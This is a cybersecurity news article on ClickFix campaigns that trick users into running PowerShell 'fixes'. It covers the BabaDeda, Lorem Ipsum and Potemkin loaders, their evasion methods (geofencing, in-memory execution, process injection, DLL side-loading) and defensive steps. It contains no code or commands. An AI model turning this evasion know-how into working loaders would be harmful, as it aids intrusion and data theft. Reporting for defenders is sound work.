ClickFix Campaigns Add New Loaders and Fake Updates to Spread Malware
By Mag-Info Tech editorial · 2026-06-17
What the ClickFix campaigns are doing now
ClickFix is a long-running social-engineering operation that tricks users into running PowerShell commands under the guise of “fixing” a problem. Recent reports show that attackers have expanded the toolkit to include three new loaders—BabaDeda Loader, Lorem Ipsum Loader, and Potemkin—each designed to slip past defenses and install additional malware. Independent research groups have documented these loaders in separate campaigns, indicating that the ClickFix ecosystem is actively maintained and diversified.
The campaigns continue to rely on the same initial deception: a convincing prompt (email, pop-up, or web page) claims a system update or security patch is required. When the user runs the supplied PowerShell command, the loader is downloaded and executed. From there, the loader profiles the host, checks for security products, and avoids systems in Russia or Belarus before retrieving and injecting a final payload into a trusted Windows process such as svchost.exe. This staged approach keeps the malicious activity hidden from many automated scanners and human analysts alike.
How BabaDeda Loader has evolved since 2021
BabaDeda Loader first appeared in late 2021 as part of a crypter service that targeted cryptocurrency and Web3 users. At the time, it hid malicious payloads inside legitimate-looking installer packages. The loader has since matured into a more capable framework that preserves the original “code genome” while adding stealth, evasion, and payload flexibility. Instead of a single static payload, the loader now supports multiple techniques—hidden PowerShell, in-memory shellcode, DLL side-loading, and external payload storage—to deliver information stealers and remote-access trojans (RATs).
In April 2026, researchers observed BabaDeda Loader hitting education and financial organizations. The loader profiles the host machine, avoids systems in specific geographies, and performs checks against common security products before retrieving the main payload. Once executed, it can inject the payload into a trusted Windows process, making detection harder for traditional antivirus and endpoint protection platforms. The payload itself is often a .NET backdoor and information stealer that can harvest sensitive data and open an encrypted channel to a command-and-control server, giving attackers persistent access and the ability to exfiltrate data over time.
New loader families in the ClickFix ecosystem
Alongside BabaDeda, two other loaders have surfaced in ClickFix campaigns: Lorem Ipsum Loader and Potemkin. While detailed technical write-ups are still emerging, the pattern mirrors BabaDeda’s approach—social-engineering delivery followed by a lightweight loader that fetches and executes a secondary payload. These loaders are likely designed to diversify the attackers’ toolkit, making it harder for defenders to build a single, unified detection signature.
Early indicators suggest that Lorem Ipsum Loader and Potemkin also employ staged loading techniques, where the visible application appears legitimate while the malicious payload remains hidden inside externally stored containers. The payload is decoded only moments before execution, minimizing forensic visibility and complicating automated analysis. This design reduces opportunities for traditional security tools to identify malicious activity before the payload is already running in memory or injected into a trusted process.
The infection chain in detail
The typical ClickFix infection chain starts with a user receiving a prompt to “ClickFix” a problem such as a missing driver, expired certificate, or required software update. Clicking the prompt executes a PowerShell command that downloads and runs the loader. The loader then performs host reconnaissance, checks for installed security products, and avoids certain geographies. If the system passes these checks, the loader retrieves the main payload from an external source—sometimes a file named List.Control.dat or similar—and injects it into a legitimate Windows process.
One documented variation uses a ZIP archive that employs DLL side-loading to launch DanaBot and SectopRAT (also known as ArechClient). A key feature in these attacks is the “Storage Crypter,” a staged loader component that reads payload material from externally stored files rather than embedding it directly. This separation makes it harder for disk-based scanners to detect the threat before execution, because the malicious content only appears in memory or as a side-loaded DLL at runtime.
Why these loaders are harder to detect
Traditional antivirus engines rely on signatures, heuristics, or behavioral rules that look for known malicious files or sequences. The new ClickFix loaders deliberately subvert these mechanisms. They avoid writing suspicious files to disk, use in-memory execution, and leverage trusted Windows processes for injection. The use of external payload storage and staged decryption further reduces the window during which the payload is visible to security tools. Even behavioral analysis can be evaded if the loader only activates after the user has closed security software or entered a specific geographic region.
Another complicating factor is the diversity of loaders. With BabaDeda, Lorem Ipsum, and Potemkin in circulation, attackers can rotate loaders to stay ahead of detection updates. Each loader may implement slightly different evasion techniques, forcing defenders to maintain multiple detection rules and behavioral models. This rotation also helps the campaigns persist even when one loader family is widely blocked, because the underlying social-engineering lure (the “ClickFix” prompt) remains effective.
Real results from MEFAI's AI. Get $50 off the Pro plan.
Sponsored · Past performance is not indicative of future results. Not financial advice.
Who is being targeted and why
Recent campaigns involving BabaDeda Loader have focused on education and financial organizations. Education institutions often have large, heterogeneous user bases and limited IT resources, making them attractive targets for credential harvesting and network reconnaissance. Financial organizations hold sensitive customer data and transaction histories, which can be monetized directly or used for further intrusions. The attackers’ ability to profile hosts and avoid certain regions suggests they are carefully selecting targets based on operational security and potential return on investment.
Beyond these sectors, the broader ClickFix ecosystem is likely opportunistic. Any user who clicks a “fix” prompt is a potential victim. The campaigns do not appear to be highly targeted at this stage; instead, they rely on volume and social engineering to achieve a foothold. Once inside, attackers can move laterally, escalate privileges, and deploy additional malware tailored to the compromised environment.
What defenders can do right now
Organizations should review email and web filtering rules to block unsolicited “update” or “fix” prompts that lead to PowerShell commands. PowerShell logging and constrained language mode can limit the impact of malicious scripts, while application control solutions (such as AppLocker or Windows Defender Application Control) can prevent unsigned or untrusted executables from running. Network monitoring for unusual outbound connections to known command-and-control servers is also critical, especially after a potential compromise.
Endpoint detection and response (EDR) tools that analyze process injection, memory anomalies, and lateral movement can catch the later stages of these attacks. Because the loaders rely on DLL side-loading and in-memory execution, memory-forensics capabilities are particularly valuable. Security teams should also review their allow lists and block lists for PowerShell, certutil, and other living-off-the-land binaries that attackers commonly abuse. Regular user awareness training remains essential to reduce the chance that someone will click a fake update prompt in the first place.
What to watch next
The diversification of loaders suggests that the ClickFix campaigns are still evolving. Expect additional loader families to appear, each with new evasion techniques. Researchers have already noted the use of “Storage Crypter” and external payload storage; similar innovations could emerge around encrypted payload delivery or abuse of legitimate cloud storage services. Defenders should prepare for loaders that can adapt to new security controls, such as AI-driven endpoint protection or stricter application control policies.
Another area to monitor is the payload ecosystem. Once a loader establishes a foothold, attackers can install anything from information stealers to ransomware. The presence of DanaBot and SectopRAT in recent campaigns indicates that banking trojans and RATs remain in active use. Organizations should ensure their incident-response playbooks cover data theft, lateral movement, and ransomware scenarios, because a single loader infection can escalate quickly if left unchecked.
Practical steps for individuals and small teams
Individual users and small teams without dedicated security staff can still reduce their risk. Disable or restrict PowerShell if it is not required for daily tasks, and enable logging when it is needed. Use a reputable ad-blocker and script-blocker in browsers to reduce exposure to fake update pop-ups. Keep operating systems and key applications updated through official channels, not third-party prompts. For small businesses, consider a lightweight EDR solution or a managed detection-and-response service to monitor for unusual activity.
If a system becomes unresponsive or shows signs of unusual network traffic, disconnect it from the network immediately and scan with multiple antivirus engines. Collect logs and process trees before rebooting, as this evidence can help responders trace the infection chain. Finally, treat any unsolicited “fix” prompt as suspicious by default—verify through official support channels rather than clicking through.
Bottom line
ClickFix campaigns have evolved from simple fake-update lures to a sophisticated ecosystem of loaders designed to evade detection and deliver a range of malicious payloads. The addition of BabaDeda, Lorem Ipsum, and Potemkin loaders shows that attackers are investing in stealth, flexibility, and operational security. Defenders must adapt by tightening application control, improving PowerShell hygiene, and deploying memory- and behavior-focused monitoring. For users, skepticism toward unsolicited “fix” prompts remains the first and most effective line of defense.
More in Cybersecurity & Privacy
Rokarolla Android Trojan Steals Banking and Crypto Credentials With 137 Commands
A new Android trojan named Rokarolla uses 137 commands to target 217 banking and crypto apps, steal credentials and SMS, and evade detection.
Malware Hidden in Steam Workshop Wallpapers Puts Gamers and Creators at Risk
Malicious wallpapers uploaded to Steam Workshop are being used to deliver backdoors, cryptominers and account hijackers to users of Wallpaper Engine, with tens of thousands of downloads before detecti
U.S. Takes Down CFAKE and SOCFAKE Deepfake Nude Sites in First TAKE IT DOWN Act Seizure
The U.S. Department of Justice has seized CFAKE.com and SOCFAKE.com, two deepfake nude sites, under the TAKE IT DOWN Act in a coordinated international operation.